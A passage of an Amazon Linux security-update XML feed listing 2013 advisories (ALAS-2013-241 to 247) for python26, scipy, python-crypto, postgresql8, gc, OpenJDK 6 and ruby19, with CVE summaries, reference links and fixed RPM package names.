name="mysql51-server" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.72-1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2013-241</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-241: medium priority package update for python26</title><issued date="2013-11-03 12:09:00" /><updated date="2015-06-22 10:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4238:
The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
A flaw was found in the way the Python SSL module handled X.509 certificate fields that contain a NULL byte. An attacker could potentially exploit this flaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that to exploit this issue, an attacker would need to obtain a carefully crafted certificate signed by an authority that the client trusts.
996381:
CVE-2013-4238 python: hostname check bypassing vulnerability in SSL module
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238" title="" id="CVE-2013-4238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-tools" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-tools-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-242</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-242: medium priority package update for scipy</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4251:
916690:
CVE-2013-4251 scipy: weave /tmp and current directory issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4251" title="" id="CVE-2013-4251" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="scipy-debuginfo" version="0.12.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/scipy-debuginfo-0.12.1-1.7.amzn1.x86_64.rpm</filename></package><package name="scipy" version="0.12.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/scipy-0.12.1-1.7.amzn1.x86_64.rpm</filename></package><package name="scipy" version="0.12.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/scipy-0.12.1-1.7.amzn1.i686.rpm</filename></package><package name="scipy-debuginfo" version="0.12.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/scipy-debuginfo-0.12.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-243</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-243: low priority package update for python-crypto</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1445:
The Crypto.Random.atfork function in PyCrypto before 2.6.1 does not properly reseed the pseudo-random number generator (PRNG) before allowing a child process to access it, which makes it easier for context-dependent attackers to obtain sensitive information by leveraging a race condition in which a child process is created and accesses the PRNG within the same rate-limit period as another process.
1020814:
CVE-2013-1445 python-crypto: PRNG not correctly reseeded in some situations
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1445" title="" id="CVE-2013-1445" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-crypto-debuginfo" version="2.6.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.7.amzn1.x86_64.rpm</filename></package><package name="python-crypto" version="2.6.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-2.6.1-1.7.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.7.amzn1.i686.rpm</filename></package><package name="python-crypto" version="2.6.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-2.6.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-244</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-244: medium priority package update for postgresql8</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1900:
A flaw was found in the way the pgcrypto contrib module of PostgreSQL (re)initialized its internal random number generator. This could lead to random numbers with fewer bits of entropy being used by certain pgcrypto functions, possibly allowing an attacker to conduct other attacks.
CVE-2013-0255:
An array index error, leading to a heap-based out-of-bounds buffer read flaw, was found in the way PostgreSQL performed certain error processing using enumeration types. An unprivileged database user could issue a specially crafted SQL query that, when processed by the server component of the PostgreSQL service, would lead to a denial of service (daemon crash) or disclosure of certain portions of server memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0255" title="" id="CVE-2013-0255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1900" title="" id="CVE-2013-1900" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1475.html" title="" id="RHSA-2013:1475" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-plpython" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.18" release="1.39.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.18" release="1.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql8-test-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.18-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-245</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-245: medium priority package update for gc</title><issued date="2013-11-04 14:53:00" /><updated date="2014-09-16 21:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-2673:
It was discovered that gc's implementation of the malloc() and calloc() routines did not properly perform parameter sanitization when allocating memory. If an application using gc did not implement application-level validity checks for the malloc() and calloc() routines, a remote attacker could provide specially crafted application-specific input, which, when processed by the application, could lead to an application crash or, potentially, arbitrary code execution with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2673" title="" id="CVE-2012-2673" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1500.html" title="" id="RHSA-2013:1500" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gc" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-debuginfo" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-debuginfo-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-devel" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-devel-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-devel" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-devel-7.1-12.6.amzn1.i686.rpm</filename></package><package name="gc" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-7.1-12.6.amzn1.i686.rpm</filename></package><package name="gc-debuginfo" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-debuginfo-7.1-12.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-246</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-246: important priority package update for java-1.6.0-openjdk</title><issued date="2013-11-05 13:35:00" /><updated date="2014-09-16 21:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5850:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5849:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5842:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5840:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5830:
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5829:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5825:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5823:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5820:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5817:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5814:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5809:
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.
CVE-2013-5804:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5803:
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit.
CVE-2013-5802:
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions.
CVE-2013-5797:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5790:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5784:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5783:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5782:
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine.
CVE-2013-5780:
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data.
CVE-2013-5778:
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory.
CVE-2013-5774:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5772:
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks.
CVE-2013-4002:
Multiple errors were discovered in the way the JAXP and Security components process XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-3829:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829" title="" id="CVE-2013-3829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772" title="" id="CVE-2013-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774" title="" id="CVE-2013-5774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778" title="" id="CVE-2013-5778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780" title="" id="CVE-2013-5780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782" title="" id="CVE-2013-5782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783" title="" id="CVE-2013-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784" title="" id="CVE-2013-5784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790" title="" id="CVE-2013-5790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802" title="" id="CVE-2013-5802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803" title="" id="CVE-2013-5803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804" title="" id="CVE-2013-5804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809" title="" id="CVE-2013-5809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814" title="" id="CVE-2013-5814" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817" title="" id="CVE-2013-5817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820" title="" id="CVE-2013-5820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823" title="" id="CVE-2013-5823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825" title="" id="CVE-2013-5825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829" title="" id="CVE-2013-5829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830" title="" id="CVE-2013-5830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840" title="" id="CVE-2013-5840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842" title="" id="CVE-2013-5842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849" title="" id="CVE-2013-5849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850" title="" id="CVE-2013-5850" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1505.html" title="" id="RHSA-2013:1505" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-247</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-247: critical priority package update for ruby19</title><issued date="2013-11-22 21:42:00" /><updated date="2014-09-16 21:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4164:
1033460:
CVE-2013-4164 ruby: heap overflow in floating point parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164" title="" id="CVE-2013-4164" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby19-irb" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.484-31.55.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-31.55.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-31.55.amzn1.noarch.rpm</filename></package><package name="rubygems19" version="1.8.23" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-31.55.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-31.55.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="31.55.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-31.55.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-31.55.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.55.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.484" release="31.55.amzn1" epoch="0" 
